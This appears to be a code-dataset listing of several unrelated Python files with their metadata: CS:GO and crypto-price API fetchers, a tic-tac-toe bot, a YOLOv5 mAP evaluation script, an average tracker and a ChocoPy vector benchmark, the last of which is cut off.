blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
748c60e91fc5cc74b95f5054423b643030571a96
|
bd2dec1356593b427b46311e88cad58702ccc2e4
|
/main.py
|
2eca735650e5713712848256d57e85eb0a8a2817
|
[] |
no_license
|
rxw/csgo_matches
|
7b3af8a09717e44a1a0f7ee9c2fe5790407489c4
|
8c0bc21a2d1a53dc5723cc76526ecd4a6d8b3bf5
|
refs/heads/master
| 2022-06-15T18:16:38.025499
| 2020-05-04T22:41:47
| 2020-05-04T22:41:47
| 260,381,161
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 327
|
py
|
#!/usr/bin/env python
"""Fetch the current CS:GO match list from the PandaScore API and print it.

Credentials (the API token and any other query parameters) are read from
creds.json in the working directory and passed as request parameters.
"""
import json
import requests

# API endpoint pieces; joined below to form the full request URL.
API_URL = 'https://api.pandascore.co'
STATS_URL = '/csgo/matches'

if __name__ == '__main__':
    # json.load reads straight from the file object -- no intermediate string.
    with open('creds.json', 'r') as f:
        creds = json.load(f)
    r = requests.get(API_URL + STATS_URL, params=creds)
    print(r.text)
|
[
"tato@uribe.com.mx"
] |
tato@uribe.com.mx
|
11c395ef17817d7f1fad83e8372a60bc573b9489
|
c1f6a9f37dc2852c7fcc5d996b242172b176775b
|
/plugins/general.py
|
91fc4559af33c14573bd69fc13790b627139f79a
|
[] |
no_license
|
rasperepodvipodvert/vk_page_cover
|
b883e03b8157237b80fe9551e58cb49f643a20ae
|
c7d7970f4c2adbcb99e5b2330cf896e150819d44
|
refs/heads/master
| 2020-03-29T18:37:35.659098
| 2018-09-27T10:48:26
| 2018-09-27T10:48:26
| 150,223,809
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
def get_btc_cost(coin):
    """Return the current USD price of *coin* (e.g. 'btc') from the
    Cryptonator ticker API.

    The price is returned exactly as the API provides it in
    data['ticker']['price'] (a string in this API's responses).
    """
    # Function-local imports kept to preserve the original module layout.
    import json
    import urllib.request

    url = 'https://api.cryptonator.com/api/ticker/%s-usd' % coin
    # Fix: the original reused the name `url` for the response object,
    # shadowing the URL string; keep the two names distinct.  The dead
    # `data = []` pre-initialization is dropped as well.
    with urllib.request.urlopen(url) as response:
        data = json.loads(response.read().decode())
    return data['ticker']['price']
|
[
"ivan@filatovz.ru"
] |
ivan@filatovz.ru
|
e0b6078e03d52085af1e4c60300dba7c10eeb40a
|
db29394afc70f72840497f5796b210382ce83541
|
/tictacbot/tictactoe_bot.py
|
6906a772497cc74a7e9f8934c96f48c3af98019e
|
[] |
no_license
|
AFakeman/tictacbot
|
bd8e5d25f9eddff0bc938c776d0f4ca219f9ff13
|
28f350d91596ff3a5e24d7a09c69192883f5682b
|
refs/heads/master
| 2021-01-17T07:30:44.388045
| 2017-03-11T22:53:32
| 2017-03-11T22:53:32
| 83,735,136
| 0
| 0
| null | 2017-03-11T20:15:08
| 2017-03-02T23:24:41
|
Python
|
UTF-8
|
Python
| false
| false
| 2,147
|
py
|
# Relative import from the sibling game module: the TicTacToe game class plus
# the `inspect` lane-counting helper and the `xy` cell-index helper.
from .tictactoe_game import TicTacToe, inspect, xy

# Module-level shorthand; presumably maps a player's mark to the opponent's
# mark -- confirm against tictactoe_game.TicTacToe.opposite.
opposite = TicTacToe.opposite
def calculate_attr(lane, turn, field_size, at_price=2, def_price=3, reinforce_price=2):
    """Classify a lane and score how attractive it is for the current player.

    Returns a (tactic, weight) tuple, where tactic is "atk" (attack),
    "def" (defend) or "frc" (reinforce).  *lane* maps marks to counts,
    with "_" counting the empty cells; *turn* is the current player's mark.
    `field_size` is accepted for signature compatibility but unused here.
    """
    # A lane with no empty cells is dead: nothing can be gained there.
    if lane["_"] == 0:
        return "atk", 0
    mine = lane[turn]
    theirs = lane[opposite(turn)]
    if mine == 0 and theirs == 0:
        # Untouched lane: worth a basic attack.
        return "atk", at_price
    if mine == 0:
        # Only the opponent occupies it: defend, weighted by their progress.
        return "def", def_price ** theirs
    if theirs == 0:
        # Only we occupy it: reinforce, weighted by our progress.
        return "frc", reinforce_price ** mine
    # Contested lane: neither side can complete it.
    return "atk", 0
class TicTacPlayer:
    """Heuristic tic-tac-toe AI: scores every cell by summing the scores of
    all lanes (column, row, diagonals) passing through it, then plays the
    highest-scoring free cell."""

    @staticmethod
    def move(game):
        """Choose and play one move on *game* (mutates it via game.move)."""
        field_size = game.field_size
        turn = game.turn
        # inspect(...) presumably counts marks along a lane defined by a
        # (step, origin) pair -- confirm in tictactoe_game.
        vert_counts = [inspect(game.field, (0, 1), (i, 0), field_size) for i in range(field_size)]
        hor_counts = [inspect(game.field, (1, 0), (0, i), field_size) for i in range(field_size)]
        diag1_count = inspect(game.field, (1, 1), (0, 0), field_size)
        diag2_count = inspect(game.field, (1, -1), (0, field_size - 1), field_size)
        # Convert raw lane counts into (tactic, score) pairs.
        vert_lanes = [calculate_attr(vert_counts[i], turn, field_size) for i in range(field_size)]
        hor_lanes = [calculate_attr(hor_counts[i], turn, field_size) for i in range(field_size)]
        diag1 = calculate_attr(diag1_count, turn, field_size)
        diag2 = calculate_attr(diag2_count, turn, field_size)
        # Score each cell: its column, its row, and any diagonal through it.
        scores = {}
        for x in range(field_size):
            for y in range(field_size):
                score = 0
                if x == y:
                    score += diag1[1]
                if x == field_size - 1 - y:
                    score += diag2[1]
                score += vert_lanes[x][1]
                score += hor_lanes[y][1]
                scores[(x, y)] = score
        # Pick the best-scoring cell that is still empty ('_').
        max_cell = (-1, -1)
        max_score = -1
        for x in range(field_size):
            for y in range(field_size):
                if (max_score < scores[(x, y)]) and game.field[xy(field_size, x, y)] == '_':
                    max_score = scores[(x, y)]
                    max_cell = (x, y)
        game.move(*max_cell)
|
[
"anton_suslov@me.com"
] |
anton_suslov@me.com
|
86289ab2c33ce91e7ef21b22dc256d3fb72b684d
|
49ac20f39a1b35b54ae47c7cfc47203165b37e4e
|
/deepblue/06.03_yolov5_model/yolo_rewrite/test.py
|
a4322c84a9f06760caaee1f48db726f0c56d3b74
|
[] |
no_license
|
walkerwzy/walker_jupyter_lab
|
30dedb2199534c166f5a315e2ed6cc7b54c5d548
|
626624100f4c3b19828755a773e1579e41ae38c8
|
refs/heads/master
| 2023-08-11T18:36:08.041160
| 2021-09-30T07:54:37
| 2021-09-30T07:54:37
| 371,611,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,080
|
py
|
import os
import cv2
import json
import argparse
import data_provider
import dataset
import heads
import maptool
import models
import nn_utils
import sys_utils
import torch
import torch.nn as nn
import numpy as np
from torch.utils.data import DataLoader
from tqdm import tqdm
from sys_utils import _single_instance_logger as logger
class Config:
    """Runtime configuration for evaluation.

    Only base_directory/batch_size/name are set here; the launcher script
    assigns the rest (dataset, image_size, weight, network, device) before
    the dataset/dataloader methods are used.
    """

    def __init__(self):
        self.base_directory = "workspace"
        self.batch_size = 32
        self.name = "default"  # experiment name

    def get_path(self, path):
        """Return *path* rooted at <base_directory>/<name>/."""
        return f"{self.base_directory}/{self.name}/{path}"

    def __repr__(self):
        return json.dumps(self.__dict__, indent=4, ensure_ascii=False)

    def get_test_dataset(self):
        """Build the evaluation dataset for the configured provider.

        Fix: use `self` instead of the module-level `config` global so the
        method works on any Config instance, not just the script's global.
        """
        if self.dataset == "VOC":
            provider = data_provider.VOCProvider("/data-rbd/wish/four_lesson/dataset/voc2007/VOCdevkitTest/VOC2007")
        elif self.dataset == "COCO":
            provider = data_provider.COCOProvider("/data-rbd/wish/four_lesson/dataset/coco2017", "2017", "val")
        else:
            assert False, f"Unknown dataset {self.dataset}"
        return dataset.Dataset(False, self.image_size, provider, self.batch_size)

    def get_dataloader_with_dataset(self, dataset):
        """Wrap *dataset* in a DataLoader sized by this config's batch size."""
        batch_size = self.batch_size  # fix: was the global `config.batch_size`
        # Cap workers by CPU count, batch size, and a hard limit of 8.
        num_workers = min([os.cpu_count(), batch_size, 8])
        dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, pin_memory=True, collate_fn=dataset.collate_fn)
        return dataloader
def test(model, test_loader, head, epoch=0):
    """Evaluate *model* on *test_loader* and return a scalar model score.

    The score is a weighted mix of mAP values:
    mAP@.5 * 0.1 + mAP@.5:.95 * 0.9.
    """
    model.eval()
    # Borrow device/dtype from the model's own parameters so inputs match.
    param = next(model.parameters())
    device = param.device
    dtype = param.dtype
    batch_size = test_loader.batch_size
    with torch.no_grad():
        groundtruth_annotations = {}
        detection_annotations = {}
        # The test loader was built with the centerAffine transform.
        # normalize_annotations rows are [image_id, class_index, cx, cy, width, height].
        for batch_index, (images, normalize_annotations, visual) in enumerate(tqdm(test_loader, desc=f"Eval map {epoch:03d} epoch")):
            images = images.to(device, non_blocking=True).type(dtype)
            predicts = model(images)
            # Decode detections; each row is [left, top, right, bottom, confidence, classes].
            objects = head.detect(predicts, confidence_threshold=0.001, nms_threshold=0.6)
            batch, channels, image_height, image_width = images.shape
            visual_image_id, visual_image, visual_annotations, restore_info = visual
            num_batch = images.shape[0]
            normalize_annotations = normalize_annotations.to(device)
            restore_info = normalize_annotations.new_tensor(restore_info)  # pad_left, pad_top, origin_width, origin_height, scale
            pixel_annotations = nn_utils.convert_to_pixel_annotation(normalize_annotations[:, [2, 3, 4, 5, 0, 1]], image_width, image_height)
            # Undo letterbox padding and scaling so ground-truth boxes are in
            # original-image coordinates.
            for i in range(num_batch):
                index = torch.where(pixel_annotations[:, 4] == i)[0]
                if len(index) == 0:
                    continue
                padx, pady, origin_width, origin_height, scale = restore_info[i]
                pixel_annotations[index, :4] = (pixel_annotations[index, :4] - restore_info[i, [0, 1, 0, 1]]) / scale
            # Collect ground truth, keying images uniquely across batches.
            for left, top, right, bottom, image_id, class_id in pixel_annotations.cpu().numpy():
                image_id = int(image_id) + batch_index * batch_size
                class_id = int(class_id)
                if image_id not in groundtruth_annotations:
                    groundtruth_annotations[image_id] = []
                groundtruth_annotations[image_id].append([left, top, right, bottom, 0, class_id])
            # Collect detections: clamp to the network frame, then restore to
            # original-image coordinates with the same pad/scale info.
            for image_index, image_objs in enumerate(objects):
                image_objs[:, 0].clamp_(0, image_width)
                image_objs[:, 1].clamp_(0, image_height)
                image_objs[:, 2].clamp_(0, image_width)
                image_objs[:, 3].clamp_(0, image_height)
                padx, pady, origin_width, origin_height, scale = restore_info[image_index]
                image_objs[:, :4] = (image_objs[:, :4] - restore_info[image_index, [0, 1, 0, 1]]) / scale
                image_id = image_index + batch_index * batch_size
                detection_annotations[image_id] = image_objs.cpu().numpy()
    # merge groundtruth_annotations
    for image_id in groundtruth_annotations:
        groundtruth_annotations[image_id] = np.array(groundtruth_annotations[image_id], dtype=np.float32)
    map_result = maptool.MAPTool(groundtruth_annotations, detection_annotations, test_loader.dataset.provider.label_map)
    map05, map075, map05095 = map_result.map
    # Weighted score favouring the stricter mAP@.5:.95 metric.
    model_score = map05 * 0.1 + map05095 * 0.9
    logger.info(f"Eval {epoch:03d} epoch, mAP@.5 [{map05:.6f}], mAP@.75 [{map075:.6f}], mAP@.5:.95 [{map05095:.6f}], Time: {map_result.compute_time:.2f} second")
    return model_score
if __name__ == "__main__":
    # CLI flags (help strings are runtime text and left exactly as-is).
    parser = argparse.ArgumentParser()
    parser.add_argument("--name", type=str, help="实验名称", default="debug")
    parser.add_argument("--batch_size", type=int, help="批大小", default=32)
    parser.add_argument("--network", type=str, help="网络的配置文件", default="models/yolov5m.yaml")
    parser.add_argument("--weight", type=str, help="权重", default="/datav/wish/yolov5-2.0/cocom.pt")
    parser.add_argument("--dataset", type=str, help="数据集", default="COCO")
    parser.add_argument("--size", type=int, help="尺寸", default=640)
    parser.add_argument("--device", type=int, help="GPU号", default=1)
    args = parser.parse_args()
    # Copy CLI arguments onto the shared Config object.
    config = Config()
    config.name = args.name
    config.device = f"cuda:{args.device}"
    torch.cuda.set_device(config.device)
    config.image_size = args.size
    config.weight = args.weight
    config.network = args.network
    config.dataset = args.dataset
    config.batch_size = args.batch_size
    sys_utils.setup_single_instance_logger(config.get_path("logs/log.log"))
    logger.info(f"Startup, config: \n{config}")
    # Load weights on CPU first; the model is moved to the GPU below.
    checkpoint = torch.load(config.weight, map_location="cpu")
    # Heuristic: checkpoints exported from the upstream yolov5 repo carry
    # their anchors under the "model.24.anchors" key.
    from_yolo_raw_checkpoint = "model.24.anchors" in checkpoint
    dataset = config.get_test_dataset()
    num_classes = dataset.provider.num_classes
    model = models.Yolo(num_classes, config.network)
    model.eval()
    model.to(config.device)
    if from_yolo_raw_checkpoint:
        logger.info("Use yolo raw checkpoint")
        # Rename the anchor tensor to our key and drop keys our model lacks.
        checkpoint['anchors'] = checkpoint['model.24.anchors']
        del checkpoint['model.24.anchors']
        del checkpoint['model.24.anchor_grid']
        head = heads.YoloHead(num_classes, model.anchors, model.strides)
        # NOTE(review): fuse() runs before load_state_dict() here, the
        # opposite order of the else-branch -- confirm this is intentional
        # (raw yolov5 checkpoints are saved with fused conv+bn weights?).
        model.fuse()
        model.load_state_dict(checkpoint)
    else:
        model.load_state_dict(checkpoint)
        head = heads.YoloHead(num_classes, model.anchors, model.strides)
        model.fuse()
    model.half()
    dataloader = config.get_dataloader_with_dataset(dataset)
    test(model, dataloader, head)
|
[
"walker.wzy@gmail.com"
] |
walker.wzy@gmail.com
|
159d50b91a1bdd3c41155ba8242ed42980a94bda
|
783382412a7cb93685d50069b041acbc06519ef3
|
/utils/average.py
|
0bec757eaa23685174dc5e5408db4a90a682485a
|
[] |
no_license
|
scy99ycs/customAnime
|
8a49e828a92b7f0b23f4b8bd03d61aa4e7324e79
|
37a2232229f6b620a1f8ea41efebab046fcc0057
|
refs/heads/master
| 2021-10-28T15:02:06.963470
| 2019-04-24T07:04:40
| 2019-04-24T07:04:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
"""
Average Tracker for training
"""
class AverageTracker:
    """Tracks a weighted running average, e.g. of a training loss.

    The tracker's name is fixed at construction time and cannot be changed.
    """

    def __init__(self, name):
        self._name = name
        self.value = 0  # current running average
        self.n = 0      # total weight of samples seen so far

    def __call__(self):
        """Calling the tracker is shorthand for get_value()."""
        return self.get_value()

    def __len__(self):
        """Total weight of samples accumulated so far."""
        return self.n

    @property
    def name(self):
        """Read-only tracker name."""
        return self._name

    @name.setter
    def name(self, value):
        raise AttributeError('Cannot modify name of average tracker')

    def update(self, value, n=1):
        """Fold *value* (with weight *n*) into the running average."""
        total = self.value * self.n + value * n
        self.n += n
        self.value = total / self.n

    def get_value(self):
        """Current running average."""
        return self.value

    def initialize(self):
        """Reset the tracker to its freshly-constructed state."""
        self.value = 0
        self.n = 0
|
[
"noreply@github.com"
] |
scy99ycs.noreply@github.com
|
69cd294a1199dd3224de74f4c1484c5f7a3cc684
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/sieve-big-6194.py
|
dff1f4eda2df9e68e045ed549fd8b7621d226b5d
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,757
|
py
|
# A resizable list of integers, backed by a list that grows on demand.
class Vector(object):
    items: [int] = None
    size: int = 0

    def __init__(self:"Vector"):
        self.items = [0]

    # Current number of slots in the backing list
    def capacity(self:"Vector") -> int:
        return len(self.items)

    # Grow the backing list by one slot and report the new capacity
    def increase_capacity(self:"Vector") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Store one value past the last used slot, growing first when full
    def append(self:"Vector", item: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Append every value of new_items, in order
    def append_all(self:"Vector", new_items: [int]) -> object:
        value:int = 0
        for value in new_items:
            self.append(value)

    # Drop the value at idx by shifting later values left (negative idx ignored)
    def remove_at(self:"Vector", idx: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Value stored at idx
    def get(self:"Vector", idx: int) -> int:
        return self.items[idx]

    # Number of values currently stored
    def length(self:"Vector") -> int:
        return self.size
# A resizable list of integers
# NOTE(review): generated benchmark code -- every "*2" member duplicates the
# base member's body.  items2/size2 are never read or written, and the extra
# parameters (item2, idx2, new_items2) are accepted but unused; all methods
# operate on `items`/`size` only.
class Vector2(object):
    items: [int] = None
    items2: [int] = None
    size: int = 0
    size2: int = 0

    def __init__(self:"Vector2"):
        self.items = [0]

    # Returns current capacity
    def capacity(self:"Vector2") -> int:
        return len(self.items)

    # Returns current capacity (duplicate; also reads `items`, not `items2`)
    def capacity2(self:"Vector2") -> int:
        return len(self.items)

    # Increases capacity of vector by one element
    def increase_capacity(self:"Vector2") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity2(self:"Vector2") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Appends one item to end of vector
    def append(self:"Vector2", item: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2 is ignored)
    def append2(self:"Vector2", item: int, item2: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends many items to end of vector
    def append_all(self:"Vector2", new_items: [int]) -> object:
        item:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2 is ignored)
    def append_all2(self:"Vector2", new_items: [int], new_items2: [int]) -> object:
        item:int = 0
        item2:int = 0
        for item in new_items:
            self.append(item)

    # Removes an item from the middle of vector
    def remove_at(self:"Vector2", idx: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2 is ignored)
    def remove_at2(self:"Vector2", idx: int, idx2: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Retrieves an item at a given index
    def get(self:"Vector2", idx: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2 is ignored)
    def get2(self:"Vector2", idx: int, idx2: int) -> int:
        return self.items[idx]

    # Retrieves the current size of the vector
    def length(self:"Vector2") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length2(self:"Vector2") -> int:
        return self.size
# A resizable list of integers
# NOTE(review): generated benchmark code -- the "*2"/"*3" members duplicate
# the base members.  items2/items3/size2/size3 are never used, extra
# parameters are accepted but ignored; all methods operate on `items`/`size`.
class Vector3(object):
    items: [int] = None
    items2: [int] = None
    items3: [int] = None
    size: int = 0
    size2: int = 0
    size3: int = 0

    def __init__(self:"Vector3"):
        self.items = [0]

    # Returns current capacity
    def capacity(self:"Vector3") -> int:
        return len(self.items)

    # Returns current capacity (duplicate)
    def capacity2(self:"Vector3") -> int:
        return len(self.items)

    # Returns current capacity (duplicate)
    def capacity3(self:"Vector3") -> int:
        return len(self.items)

    # Increases capacity of vector by one element
    def increase_capacity(self:"Vector3") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity2(self:"Vector3") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity3(self:"Vector3") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Appends one item to end of vector
    def append(self:"Vector3", item: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2 is ignored)
    def append2(self:"Vector3", item: int, item2: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2/item3 are ignored)
    def append3(self:"Vector3", item: int, item2: int, item3: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends many items to end of vector
    def append_all(self:"Vector3", new_items: [int]) -> object:
        item:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2 is ignored)
    def append_all2(self:"Vector3", new_items: [int], new_items2: [int]) -> object:
        item:int = 0
        item2:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2/new_items3 are ignored)
    def append_all3(self:"Vector3", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
        item:int = 0
        item2:int = 0
        item3:int = 0
        for item in new_items:
            self.append(item)

    # Removes an item from the middle of vector
    def remove_at(self:"Vector3", idx: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2 is ignored)
    def remove_at2(self:"Vector3", idx: int, idx2: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2/idx3 are ignored)
    def remove_at3(self:"Vector3", idx: int, idx2: int, idx3: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Retrieves an item at a given index
    def get(self:"Vector3", idx: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2 is ignored)
    def get2(self:"Vector3", idx: int, idx2: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2/idx3 are ignored)
    def get3(self:"Vector3", idx: int, idx2: int, idx3: int) -> int:
        return self.items[idx]

    # Retrieves the current size of the vector
    def length(self:"Vector3") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length2(self:"Vector3") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length3(self:"Vector3") -> int:
        return self.size
# A resizable list of integers
# NOTE(review): generated benchmark code -- the "*2".."*4" members duplicate
# the base members.  items2-4/size2-4 are never used, extra parameters are
# accepted but ignored; all methods operate on `items`/`size` only.
class Vector4(object):
    items: [int] = None
    items2: [int] = None
    items3: [int] = None
    items4: [int] = None
    size: int = 0
    size2: int = 0
    size3: int = 0
    size4: int = 0

    def __init__(self:"Vector4"):
        self.items = [0]

    # Returns current capacity
    def capacity(self:"Vector4") -> int:
        return len(self.items)

    # Returns current capacity (duplicate)
    def capacity2(self:"Vector4") -> int:
        return len(self.items)

    # Returns current capacity (duplicate)
    def capacity3(self:"Vector4") -> int:
        return len(self.items)

    # Returns current capacity (duplicate)
    def capacity4(self:"Vector4") -> int:
        return len(self.items)

    # Increases capacity of vector by one element
    def increase_capacity(self:"Vector4") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity2(self:"Vector4") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity3(self:"Vector4") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity4(self:"Vector4") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Appends one item to end of vector
    def append(self:"Vector4", item: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2 is ignored)
    def append2(self:"Vector4", item: int, item2: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2/item3 are ignored)
    def append3(self:"Vector4", item: int, item2: int, item3: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2..item4 are ignored)
    def append4(self:"Vector4", item: int, item2: int, item3: int, item4: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends many items to end of vector
    def append_all(self:"Vector4", new_items: [int]) -> object:
        item:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2 is ignored)
    def append_all2(self:"Vector4", new_items: [int], new_items2: [int]) -> object:
        item:int = 0
        item2:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2/new_items3 are ignored)
    def append_all3(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
        item:int = 0
        item2:int = 0
        item3:int = 0
        for item in new_items:
            self.append(item)

    # Appends many items to end of vector (new_items2..new_items4 are ignored)
    def append_all4(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
        item:int = 0
        item2:int = 0
        item3:int = 0
        item4:int = 0
        for item in new_items:
            self.append(item)

    # Removes an item from the middle of vector
    def remove_at(self:"Vector4", idx: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2 is ignored)
    def remove_at2(self:"Vector4", idx: int, idx2: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2/idx3 are ignored)
    def remove_at3(self:"Vector4", idx: int, idx2: int, idx3: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Removes an item from the middle of vector (idx2..idx4 are ignored)
    def remove_at4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> object:
        if idx < 0:
            return
        while idx < self.size - 1:
            self.items[idx] = self.items[idx + 1]
            idx = idx + 1
        self.size = self.size - 1

    # Retrieves an item at a given index
    def get(self:"Vector4", idx: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2 is ignored)
    def get2(self:"Vector4", idx: int, idx2: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2/idx3 are ignored)
    def get3(self:"Vector4", idx: int, idx2: int, idx3: int) -> int:
        return self.items[idx]

    # Retrieves an item at a given index (idx2..idx4 are ignored)
    def get4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> int:
        return self.items[idx]

    # Retrieves the current size of the vector
    def length(self:"Vector4") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length2(self:"Vector4") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length3(self:"Vector4") -> int:
        return self.size

    # Retrieves the current size of the vector (duplicate)
    def length4(self:"Vector4") -> int:
        return self.size
# A resizable list of integers
# Fix: get2's first parameter was annotated `idx: $Type` -- a leftover
# template placeholder from the benchmark generator and a syntax error.
# It is restored to `int`, matching every sibling get* method.
# NOTE(review): generated benchmark code -- the "*2".."*5" members duplicate
# the base members.  items2-5/size2-5 are never used, extra parameters are
# accepted but ignored; all methods operate on `items`/`size` only.
class Vector5(object):
    items: [int] = None
    items2: [int] = None
    items3: [int] = None
    items4: [int] = None
    items5: [int] = None
    size: int = 0
    size2: int = 0
    size3: int = 0
    size4: int = 0
    size5: int = 0

    def __init__(self:"Vector5"):
        self.items = [0]

    # Returns current capacity
    def capacity(self:"Vector5") -> int:
        return len(self.items)

    # Returns current capacity (duplicate)
    def capacity2(self:"Vector5") -> int:
        return len(self.items)

    # Returns current capacity (duplicate)
    def capacity3(self:"Vector5") -> int:
        return len(self.items)

    # Returns current capacity (duplicate)
    def capacity4(self:"Vector5") -> int:
        return len(self.items)

    # Returns current capacity (duplicate)
    def capacity5(self:"Vector5") -> int:
        return len(self.items)

    # Increases capacity of vector by one element
    def increase_capacity(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity2(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity3(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity4(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Increases capacity of vector by one element (duplicate)
    def increase_capacity5(self:"Vector5") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Appends one item to end of vector
    def append(self:"Vector5", item: int) -> object:
        if self.size == self.capacity():
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Appends one item to end of vector (item2 is ignored)
    def append2(self:"Vector5", item: int, item2: int) -> object:
